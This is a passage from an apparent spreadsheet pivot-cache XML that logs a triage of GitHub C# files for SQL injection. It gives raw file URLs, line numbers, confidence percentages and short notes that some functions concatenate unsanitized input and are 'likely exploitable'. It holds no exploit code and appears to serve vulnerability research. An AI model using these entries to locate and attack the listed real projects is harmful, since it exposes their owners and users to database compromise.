    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/DraSonDS/COOLMANAGER/raw/fc42b279b98e791f73e1ac8bc67cbf1f2e14e310/COOLMANAGER/Views/A_Pages/TeacherTabs/TeacherForm.xaml.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/499453466/Max22123/raw/9bd0f2e829ea82ec1779b5bf8a49af3f4bc19ffa/vsprojects/RandomItemStats/RandomItemStatsGenerator.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/CassianoR/OlharDeMenina/raw/2237dfcb75d38987a6ece7b4b55bc5c126b4d661/OlharDeMenina/Modelo/FuncionariosDAO.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/RubenTeles/Vinhos/raw/bb4163010d5cd3567f28939f9bebf9297e89e48f/DALL/Utilizador_Metodos.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/jorgennihlgard/OrchardTemplate/raw/a6d2788691d380ca705ccf20c8b6a41daf965987/Orchard.Web/Modules/Upgrade/Controllers/ContentPickerController.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/ramansidhu666/Jeyapirathap-Sivapalan/raw/95547c54e643ac5ce4fd6dcc7906f41ff7fd3ad6/Paresh_DesaiRealtor/App_Code/cls_Property.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/16it/sharpmap/raw/8cd83f89b85c028ba14f8adfbd304dfd1f36e4f0/Branches/Trunk-Benjii/SharpMap.Extensions/Data/Providers/SqlLite.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-10T00:00:00"/>
    <s v="https://github.com/trentinodigitale/GVC/raw/b2fb0dd6863c3827aa782577742851988e932b69/Repository/rtier/Service/GVCTLOG_SEGNALAZIONICollection.generated.cs"/>
    <x v="2"/>
    <x v="1"/>
    <n v="174"/>
    <x v="2"/>
    <s v="Did not install"/>
    <s v="SQL-IDIA is possible if the whereSQL and orderBySql function arguments are unsanitized"/>
    <s v="30_x000a_%"/>
    <n v="10"/>
    <s v="100% C#"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/sxycxwb/SipolenFramework/raw/aebc644b7ed37222e246528cfec879deb5b6f133/Code/RDIFramework.BizLogic/Manager/Base/CiFileManager.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/NyagakaEnock/SiteManager/raw/d8532889a17cd38e97c1d786ee7766414e91f5e3/Site%20Manager/frmPaymentConfirmation.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/RH90/KeyList/raw/746b1e0b84dd9e953841adf0c09f257e9d8eebf3/KeyList/SQL.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/dhnguyencs/MyMuse/raw/397108769ab092bde7c51e34ec54887ec180c46b/FinalProject_340/Models/SqlDBConnection.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/wuchao288/wexin/raw/5f932bbf01b06f12df01e2adcfede3f32e0c38e3/Hidistro.SqlDal/Store/MenuDao.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/zhenghua75/WeiXinEasy/raw/f21f0f0788f4792a1e30ec4e8ec190984ca13713/DBUtility/DbHelperSQLite.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/saxenanaman/Judiciary-Information-System/raw/2ec1b840df7b1622a85cc3b90608dbd7be53de5d/Judiciary%20Information%20System/UserHome.aspx.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/ainqlyi/CRS/raw/b01e302b74df770d95c3da9cb34c78a38a36a7a2/RestfulGeoCoder/GeoDatabaser.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/phuongoc/btlhsk/raw/2461716a5489586e4a66f1deb7c32fd160c7e2af/BTLHSK/Sach.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/InfernapeRotMG/Discovered-Realms-Source/raw/e5d407f087aee09274399bfb252346c640462e01/Server%20Source/server/account/redeemGiftCode.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/Zhang-YSU/ORACLE-TEST/raw/22d8d3082d5cce279de3087553a64668fc86421a/OracleTest/Form1.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/pk-codebox-evo/db-hsqldb/raw/35c1869616dd2b04dd2d7eb1a0af6e2379b040e1/dotnet/trunk/System.Data.Hsqldb/System.Data.Hsqldb.Client/HsqlDataAdapter.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-10T00:00:00"/>
    <s v="https://github.com/matthieu-dubois/MDU_ReaderNFC/raw/bebe93de751f06f8742e55465a06bcdb1777d32b/WindowsFormsApp1/Form1.cs"/>
    <x v="2"/>
    <x v="1"/>
    <n v="170"/>
    <x v="3"/>
    <s v="Did not install"/>
    <s v="The function interpolates input from a text box, so it is likely exploitable"/>
    <s v="75_x000a_%"/>
    <n v="10"/>
    <s v="100% C#"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/NevsCode/studentApp/raw/349d1bb4a3e9bf5c7391d9384889c47c41487765/MainWindow.xaml.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-10T00:00:00"/>
    <s v="https://github.com/Sarah079/DB_all_connection_ways/raw/38edeb982befe87842f5c0e20b6995ac107c43ff/CUD272ClassTutorial/OurServices/data/PersistentDataService.cs"/>
    <x v="3"/>
    <x v="2"/>
    <m/>
    <x v="4"/>
    <s v="Did not install"/>
    <m/>
    <m/>
    <m/>
    <s v="404 error when loading repo"/>
  </r>
  <r>
    <d v="2023-08-10T00:00:00"/>
    <s v="https://github.com/ramyothman/RBM/raw/776dec4975bdb24f3e6029e161f12536dff0a218/Jareeda/DataAccessLayer/DataAccessComponents/Conference/InvitedGuestsDAC.cs"/>
    <x v="1"/>
    <x v="1"/>
    <n v="76"/>
    <x v="5"/>
    <s v="Did not install"/>
    <s v="It is exploitable if the function argument is not sanitized"/>
    <s v="25_x000a_%"/>
    <n v="20"/>
    <s v="Many compiler errors, it seems the project is using deprecated functions/namespaces"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/tgemelgo/MicroERP/raw/2737f32f2d3b0793541492a2b865ec79dc5c94e2/Generico/Class/Data/cf_Manipula_Registros.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/mcitarella/Microsoft_SQL_SERVER_SAMPLES/raw/69a74410c402e38f001fff53f6a85f2b3a9284b2/samples/tutorials/c%23/macOS/SqlServerColumnstoreSample/Program.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/rlfqudxo/playscript-mono/raw/4cba1782f6b5d1bcb0b4d435cc8ae9e0a1fc887d/mcs/class/System.Data/System.Data.SqlClient/SqlCommandBuilder.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/jirkadanek/activemq-dotnet/raw/fb0f8eb40c0af041ba85d2a074942213468140d8/Apache.NMS.ActiveMQ/tags/1.6.4/src/test/csharp/DtcConsumerTransactionsTest.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/ruitengsoftware/JProgram/raw/6de495cc5c0fadce6f9bfca09430ba53bf961983/%E6%A0%87%E5%87%86%E6%AD%A3%E6%96%87%E7%8B%AC%E7%AB%8B%E7%89%88%E6%9C%AC/WindowsFormsApp1/UC/UCTask.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/dnobori/DN-OSS-Learn/raw/55dd666bae224427e2847f29b8aa2888d68c2763/dotnet-5.0.0/SqlClient-2.1.0-preview2/src/Microsoft.Data.SqlClient/tests/ManualTests/SQL/SqlBulkCopyTest/Transaction1.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/riryk/corefx/raw/441238d5a50ee3cb19179e93c2b94ec7b09ca214/src/System.Data.SqlClient/tests/ManualTests/SQL/ParallelTransactionsTest/ParallelTransactionsTest.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/KishanMaurya/Tour-Travell/raw/71e9a02e6783304799c5001afda681d4b1442d9a/Travel/register.aspx.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/hippietrail/hsb0307/raw/4c80764e118f61adc18466103d0dab25a141bf8e/projects/Foosun/Foosun.SQLServerDAL/Search.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/LukeInkster/CSharpCorpus/raw/919b7525a61eb6b475fbcba0d87fd3cb44ef3b38/mono/mcs/class/System.Data.OracleClient/Test/System.Data.OracleClient.jvm/OracleDataReader/OracleDataReader_GetOrdinal.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/PanzerFaustNL/playscript-mono/raw/bdd54caeb7377f946dea47746e263bb7a538b9f3/mcs/class/System.Data/System.Data.Common/DbCommandBuilder.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/wqjzzgci/hydronumerics/raw/20051f52e1b921deca0d94670f46b54dadea4139/ThirdPartySoftware/DataConnector/DataConnectorWCF/Services/SQLService.svc.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/guoyu07/XSTORE/raw/2462dbdb6a9d0acb5b21b10c639e9030ad20fd56/%E4%BA%8C%E4%BB%A3/X_STORE/tdx.database/tdx.database/database/B2C_vipcard.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/ume-instructor/ume-1082-rec07jfihtupfsohf-unity/raw/21ce391da655778a4ea1f0f910438487d0b59b37/game/Assets/ume-system/Editor/sync/Data_Logging.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/AdriVanHoudt/School/raw/679b3f13b7553c37c1f4c75c0b64f3d750f37f5f/KdG12-13/.NET/Projects/Voorbeelden/SupportTicketSystemSolution2/TicketSystemCA_ADONET/DAL/SqlClientManager.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/Linwenqiang-git/AttributeSql/raw/162871712fd88214d02e37ec1d646cd2bd02426e/AttributeSqlDLL.Core/Repository/AttrBaseRepository.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/shendongnian/code/raw/d29ee0b912c7213ff4b536ca0525807551bfd19b/code2/380721-23701648-0.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/axius16/Jeremiah/raw/819755ecbd2d4a6916796282bd75351302eefef4/FrbaCommerce/FrbaCommerce/DAO/DaoEmpresa.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/mygithub6/CMS/raw/48685b3ed7f3ed4f40d1081f0bc937a4e3b2338f/src/Orchard/Data/Migration/Interpreters/MySqlCommandInterpreter.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/KenthJohan/RISE_datasink/raw/7a6860179c6356dbd259b24b27c354dfc3c3bd1e/demo1_ef/Demo_Controller.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-10T00:00:00"/>
    <s v="https://github.com/seaque/LibraryManagement/raw/90d36ddce71b7f607e71d8ac02f31021f607eddd/DAL/Book_DAL.cs"/>
    <x v="2"/>
    <x v="1"/>
    <n v="198"/>
    <x v="6"/>
    <s v="Did not install"/>
    <s v="IDIA  is possible if the function arguments are unsanitized"/>
    <s v="25_x000a_%"/>
    <n v="10"/>
    <s v="100% C#"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/darkgouhzer/diprolim/raw/08cbf8a0ef5979e0df9839f03787e809dd4e0554/Diprolim/dise%C3%B1onuevo/Diprolim/Diprolim/BuscarArticulosVendedor.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-10T00:00:00"/>
    <s v="https://github.com/398786172/GIT/raw/f32453a546d819f0e5e438d58f77facfd41dbb7f/OCV0625/DBUtility/SQLServerHelp.cs"/>
    <x v="2"/>
    <x v="1"/>
    <n v="345"/>
    <x v="3"/>
    <s v="Did not install"/>
    <s v="Exploitable if the function arguments aren't sanitized"/>
    <s v="25_x000a_%"/>
    <n v="10"/>
    <s v="100% C#"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/Rinaloving/AutoSubmit/raw/25762154406b6e7e74d31e3917093957c8457d08/AutoSubmit/BDCSubmit.Business/BLL/QX/DataExchangeHandler.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/paulusyeung/RT2020/raw/59bda9340e02a6a8bd426072f1e02bcf3490e684/RT2020.DAL/MemberApply.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/alahyarizahra/sabtename/raw/12aac473178384d129e4a4b8a14194b238e9140f/New%20folder%20(4)/sabtname/sabtname/admin.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-10T00:00:00"/>
    <s v="https://github.com/Marouen-Mahou/INSAT-GL3-.NET-DataBases-TP2/raw/43fe0d0610dbdffbdc621ba1439b6170bc284d85/ADO.NET%20Connect%C3%A9/Program.cs"/>
    <x v="2"/>
    <x v="1"/>
    <n v="63"/>
    <x v="1"/>
    <s v="Did not install"/>
    <s v="Directly concatenates input from the console, very likely exploitable"/>
    <s v="90_x000a_%"/>
    <n v="10"/>
    <s v="100% C# and TSQL"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/Rhetos/Rhetos/raw/e09e56af05ed78a81929ef36af1c3d3c7d6e3fb7/Source/Rhetos.Deployment/ConnectionTesting.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/robgray/WebSiteBase/raw/918d32cc90cd9960b4d1998aa29fc89c514e0abc/Tests/UnitTests/Database/KeyTests/PrimaryKeyTests.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/lamainbe/Cued-InWebSite/raw/61c1f13bbe2e0bc25d37f6a340c6fc9f4660469f/Cued-InWebSite/JobListings.aspx.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/zoomla/CMS-Source-code/raw/058828244ff1753f5a74a81432e41ce53234cd63/Zoomla%E9%80%90%E6%B5%AACMS2_x3.8%E6%BA%90%E7%A0%81-webform/ZoomLa.SQLDAL/SQLite/SQLiteHelper.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/HXM-L/shopping_website/raw/341a5327f42d3f17acd3388f89a2f483090d109e/shopping_website/ModifyInformation.aspx.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/dnobori/DN-OSS-Learn/raw/66ccad1828369b4a4d2f5ecab87c5d24c87f2762/corefx-181216/src/System.Data.SqlClient/tests/ManualTests/SQL/SqlBulkCopyTest/MissingTargetColumn.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-10T00:00:00"/>
    <s v="https://github.com/jrafael05/SISTEMA-DE-VENTAS/raw/39a9557715ee8aa33fc690d13e49af4fd2815941/DATOS/MovimientoDAL.cs"/>
    <x v="2"/>
    <x v="1"/>
    <n v="45"/>
    <x v="3"/>
    <s v="Did not install"/>
    <s v="Vulnerable if the argument is unsanitized"/>
    <s v="25_x000a_%"/>
    <n v="10"/>
    <s v="100% C#"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/gotowork/LimsProject.Business/raw/d5aedcc363e8bd645570e8040159cb2cbb2b2249/DataLayer/CBatchSql.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/guidebot4000/fantastic-couscous/raw/c213822924b59b0881f378c917014ebe0ddbe6dc/PrevueGuide.Core.Data.SQLite/SQLiteListingsData.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/yoxking/SmartQueueSys-master/raw/7e9d472177c588eede3b44eb08646ada4f03a3e0/EntFrm.Business.SQLServerDAL/RUsersInfoDAL.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/498953584/FANPUPM/raw/f1cd54c48c3a0f89f20fedca55b96330b9e00589/App_Code/com.jwsoft.pm.entpm.action/Fund_Plan_MonthMainAction.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/ink-inc/MagicMittelalterGame/raw/8e076b68fbd0592e8ee079adc7c4d08f43ebb14e/Assets/Scripts/Database/DialogueLineDB.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/softlgl/mysql-connector-net/raw/e9f447130843b71d85b1e0458b5deeae728ed662/MySQL.Data/tests/MySql.Data.Tests/TestBase.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/jhssugi/FreeSql/raw/bad7107126486877055541a36cfde793b1f53131/FreeSql.Tests/FreeSql.Tests/DataContext/SqlServer/SqlServerFixture.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/olugbengakaka/POS-Gas-Sales-Multi/raw/71300fc0567a35ef9770957b7d7ae2f187e124ed/POS-Eatery/Repayment_Break.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/Omerkdr/Student-Dormitory-Registration-System/raw/37131d9ae70f597763dc80e148ccbdc4bd3ef779/YurtKayitSistemi/FrmAdminGiriss.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/AnnaLut/abs3/raw/47b28c8b8909a6aa3681c8d920e1d35aa89777ab/web/crkr/barsroot/deposit/depositpercentpay.aspx.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/Melissa13/base-de-datos/raw/4a8fa26ea4f1e8c52e0763c9d11a718f50140cff/localDatabaseApp/Form1.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/dwinner/netAppDev/raw/5ccdbbc15a65c51d9f11b044968b63b2a588dc76/Data/ADO.NET/HowTo/02-MySqlConnectAndRead/Program.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/luokk/scada/raw/30358ba0e1c7c3bf5c580a7b5b103bd2f80e5b14/DAQ/Scada.Data.Client.Tcp/DBDataSource.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/brumschlag/nohros-must/raw/8d96144c969ff8f59d4f7c20eda1b4fc3fb1b22b/src/impl/providers/sqlserver/RemoveStateQuery.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/498953584/FANPUPM/raw/f1cd54c48c3a0f89f20fedca55b96330b9e00589/PmDataAccess/cn.justwin.stockDAL/ResourcePTAction.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-10T00:00:00"/>
    <s v="https://github.com/ColinLoveLucky/NetFrameworkDemo/raw/3fea018516df499696b04c062450cac7e3d71686/xianggangqapp/QK.APP.Entity/ExtendEntity/BasicEntity.cs"/>
    <x v="1"/>
    <x v="1"/>
    <n v="61"/>
    <x v="5"/>
    <s v="Did not install"/>
    <s v="Depends on the function argument"/>
    <s v="15_x000a_%"/>
    <n v="15"/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/AnnaLut/abs3/raw/47b28c8b8909a6aa3681c8d920e1d35aa89777ab/web/mmfo/barsroot/App_Code/Areas/SignStatFiles/Infrastructure/Repository/DI/Implementation/SignStatFilesRepository.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/huusumo/cs_windows/raw/a74f66fb2898f9e4ef79dd4b1f13746dfee7ad18/QLSV/QLSV/DataAccessLayer.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/longsamaa/banthuoc/raw/57907fdd09490f0f3ecf446aa1227fb4fa7d7a5a/QuanLyBenhNhan/Model/Model_qlthuoc.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/fred-merlo-aurea/km-all-projects/raw/b1f069b1d6e24e6b8729b473bd29f894279722d5/UAD/KMPS_Tools/BPALog/BPALogFix.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-10T00:00:00"/>
    <s v="https://github.com/ChrisZhou0405/OneLinkWalk/raw/16b94a5d9d6b7141bfb5ec3f363afde109b49723/Backup/KINGTOP.WEB/SysAdmin/Model/ModelAjaxDeal.asmx.cs"/>
    <x v="1"/>
    <x v="1"/>
    <n v="65"/>
    <x v="3"/>
    <s v="Did not install"/>
    <s v="Depends on the function arguments"/>
    <s v="25_x000a_%"/>
    <n v="25"/>
    <s v="498 compiler errors"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/JoshSipsy/UNG_Food_Pantry_Database/raw/35abcdaffb9a3463f0dfd7b2b8373f25ffb5584e/MyCode/Supplies_Inventory_Page.aspx.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/damoOnly/e-commerce/raw/f388cd16e691690bcb2d4950cee0402bd6aeb2af/Code/Code/EcShop.SqlDal/Commodities/BrandCategoryDao.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-10T00:00:00"/>
    <s v="https://github.com/mharisbaig/Global_Cable_Network/raw/93e88e876d2418de7d1c7844586347439889091b/frmLineMan.cs"/>
    <x v="2"/>
    <x v="1"/>
    <n v="374"/>
    <x v="3"/>
    <s v="Did not install"/>
    <s v="Vulnerable if function argument is not sanitized"/>
    <s v="25_x000a_%"/>
